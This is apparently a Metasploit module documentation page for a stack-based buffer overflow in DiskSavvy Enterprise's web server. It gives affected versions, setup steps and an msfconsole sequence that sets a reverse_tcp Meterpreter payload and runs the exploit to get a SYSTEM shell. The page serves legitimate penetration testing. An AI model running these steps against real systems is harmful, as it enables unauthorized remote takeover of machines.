Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Path: blob/master/documentation/modules/exploit/windows/http/disksavvy_get_bof.md
Views: 11789
Vulnerable Application
DiskSavvy Enterprise versions up to v9.3.14 are affected by a stack-based buffer overflow vulnerability which can be leveraged by an attacker to execute arbitrary code in the context of NT AUTHORITY\SYSTEM on the target. The vulnerability is caused by improper bounds checking of the request path in HTTP GET requests sent to the built-in web server. This module has been tested successfully on Windows XP SP3 and Windows 7 SP1. The vulnerable application is available for download at Exploit-DB.
Verification Steps
Install a vulnerable DiskSavvy Enterprise
Start
Disk Savvy Enterprise
serviceStart
Disk Savvy Enterprise
client applicationNavigate to
Tools
>Advanced Options
>Server
Check
Enable Web Server On Port 80
to start the web interfaceStart
msfconsole
Do
use exploit/windows/http/disksavvy_get_bof
Do
set rhost ip
Do
check
Verify the target is vulnerable
Do
set payload windows/meterpreter/reverse_tcp
Do
set lhost ip
Do
exploit
Verify the Meterpreter session is opened
Scenarios
###DiskSavvy Enterprise v9.1.14 on Windows XP SP3
###DiskSavvy Enterprise v9.3.14 on Windows 7 SP1